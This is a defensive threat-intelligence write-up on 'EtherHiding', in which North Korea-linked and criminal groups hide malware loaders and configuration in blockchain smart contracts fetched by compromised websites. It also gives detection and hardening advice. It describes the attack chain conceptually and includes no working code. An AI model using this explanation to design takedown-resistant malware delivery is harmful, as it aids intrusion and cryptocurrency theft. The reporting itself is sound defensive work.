Introduction: the problem and definition
Google’s Threat Intelligence Group (GTIG) reports that a North Korea–linked threat cluster tracked as UNC5342 has adopted “EtherHiding”—a technique that stores malicious code and control data inside smart contracts on public blockchains (notably Ethereum and BNB Smart Chain). This marks the first time GTIG has seen a nation-state actor use this method to deliver malware and steal cryptocurrency, raising the bar for takedowns because smart-contract data is decentralized, highly available, and effectively immutable once deployed.
In brief
- Who: DPRK-linked UNC5342 (nation-state) and, in a parallel track, UNC5142 (financially motivated) also abusing the same tactic.
- What: “EtherHiding” to host payloads/instructions in smart contracts, fetched at runtime by compromised sites/scripts.
- Why it’s hard to stop: smart contracts are public, resilient, and undeletable; even if tagged as malicious, code remains accessible.
- Impact: malware distribution, credential/crypto theft, and durable C2-style infrastructure that is hard to disrupt via traditional takedowns.
Context / history / connections
The EtherHiding idea surfaced in 2023–2024 among cybercriminals, then matured as researchers detailed how malicious JavaScript or configuration can live on-chain and be retrieved on demand. GTIG/Mandiant tracked UNC5142 using EtherHiding since late 2023 to spread stealers like Vidar, Lumma, Rhadamanthys (RADTHIEF) and Atomic (AMOS) via compromised WordPress sites. The new twist: UNC5342 (DPRK) operationalized the same technique for state-backed goals in 2025.
This sits within a broader DPRK trend: increasingly sophisticated crypto-theft and developer-targeted operations, which have already yielded multi-billion-dollar crypto losses in 2025.
Technical analysis / details of the vulnerability
Attack surface & delivery
- Initial access / lure. UNC5342 campaigns use social-engineering themes (e.g., “Contagious Interview” developer lures) that direct targets to compromised legitimate websites. These pages carry injected scripts.
- On-chain retrieval. Instead of pulling payloads from a conventional attacker server, the script calls public RPC endpoints (e.g., BNB Smart Chain/Ethereum providers) using libraries like
web3/ethers. It reads data fields or event logs from specific smart contracts that store obfuscated code, URLs, or configuration. - De-obfuscation & staging. The browser (or loader) de-obfuscates the blob and either executes in-browser JS (for drive-by behaviors) or fetches a next-stage payload (e.g., stealer/downloader) from a rotating set of hosts referenced inside the on-chain data—achieving bulletproof “content addressing” via the blockchain.
- Persistence & redundancy. Because smart contracts are immutable, defenders cannot remove malicious data. Even if one RPC or CDN blocks access, alternative RPC providers or full nodes continue to serve the same contract state. This makes sinkholing/takedown far less effective than with traditional C2.
What’s new with UNC5342?
GTIG says UNC5342 is the first nation-state they’ve observed using EtherHiding to deliver malware and facilitate cryptocurrency theft, lifting a technique from cybercrime into the APT space and blending it with DPRK’s revenue-driven operations.
Parallel criminal activity (UNC5142).
Mandiant/GTIG highlight a financially motivated actor abusing the same pattern, pushing well-known infostealers via infected WordPress sites—illustrating how decentralized hosting is becoming a cross-ecosystem distribution primitive.
Practical consequences / risks
- Durable infrastructure: on-chain payloads/configs are hard to eradicate, complicating incident response and threat-infrastructure disruption.
- Detection blind spots: typical URL/domain IOCs are less useful; access may look like benign blockchain RPC traffic from the browser/server.
- Mass compromise leverage: once attackers seed many compromised CMS sites, each page becomes a launcher for the same on-chain data, enabling broad distribution without centralized hosting.
- Crypto-theft efficacy: DPRK’s past focus on crypto monetization aligns with EtherHiding’s resilience, increasing dwell time and revenue potential.
Operational recommendations / what to do next
Network & application controls
- Monitor and govern blockchain RPC usage from web properties and user endpoints (e.g., calls to
rpc.ankr.com,cloudflare-eth.com,bsc-dataseed.binance.org, etc.). Alert when browser code on corporate sites queries unapproved smart contracts. (Derives from GTIG’s description of on-chain retrieval.) - Apply strict Content Security Policy (CSP) on web apps to limit where scripts can connect (
connect-src) and which scripts can execute (script-src 'self'with nonces). This constrains drive-by fetches to blockchain APIs. (Best practice aligned to GTIG findings.) - WAF/EDR detections: create detections for runtime
web3/ethersusage patterns in unexpected contexts (e.g., corporate sites not involved in Web3).
Smart contract & IOC handling
- Track contract addresses identified by researchers and block or alert on page loads that query them via public RPCs. Maintain lists similar to IP/domain IOCs but at the contract-address level. (Guidance inferred from GTIG reports.)
- Multi-provider blocking: if one RPC provider removes access and others don’t, enforce controls at your egress—not just rely on third-party blocking. GTIG notes inconsistent cooperation among intermediaries.
CMS hygiene (critical for WordPress)
- Patch CMS/core/plugins; eliminate unauthorized JS injections; monitor file-integrity for theme/plugin changes; inventory inline event handlers often used to bootstrap EtherHiding loaders. (Matches UNC5142/UNC5342 delivery vectors.)
User & developer protection
- Harden developer endpoints targeted by DPRK lures; enforce application allow-listing; isolate wallets from daily-driver machines; use passphrase managers/hardware wallets; and train staff to treat job/interview outreach and developer tool downloads with elevated suspicion.
Differences / comparisons with other cases
- Versus IPFS / paste sites / social-media C2: Those can be removed or accounts banned; smart contracts are immutable, so the same on-chain blob persists regardless of takedowns.
- Versus DNS dead-drops: DNS-based resolvers rely on registrars/hosters that can be seized; blockchain data is replicated across nodes and RPC providers, giving higher survivability.
Summary / key takeaways
- DPRK-linked UNC5342 has weaponized EtherHiding, making decentralized, resilient malware delivery a state-level capability.
- UNC5142 shows criminals are already using the same pattern at scale via compromised WordPress—expect copycats.
- Defenses must evolve beyond domain/IP IOCs to contract-address awareness, CSP hardening, RPC egress controls, and CMS integrity.
Sources / bibliography
- The Record (Recorded Future News): “North Korean hackers seen using blockchain to hide malware” (Oct 16–17, 2025). (The Record from Recorded Future)
- Google Cloud / GTIG: “DPRK adopts EtherHiding” (Oct 16, 2025). (Google Cloud)
- Google Cloud / GTIG + Mandiant: “UNC5142 leverages EtherHiding to distribute malware” (Oct 16, 2025). (Google Cloud)
- BleepingComputer: “North Korean hackers use EtherHiding to hide malware on the blockchain” (Oct 16, 2025). (BleepingComputer)
- BankInfoSecurity: “Hackers Use Blockchain to Hide Malware in Plain Sight” (Oct 16, 2025). (BankInfoSecurity)
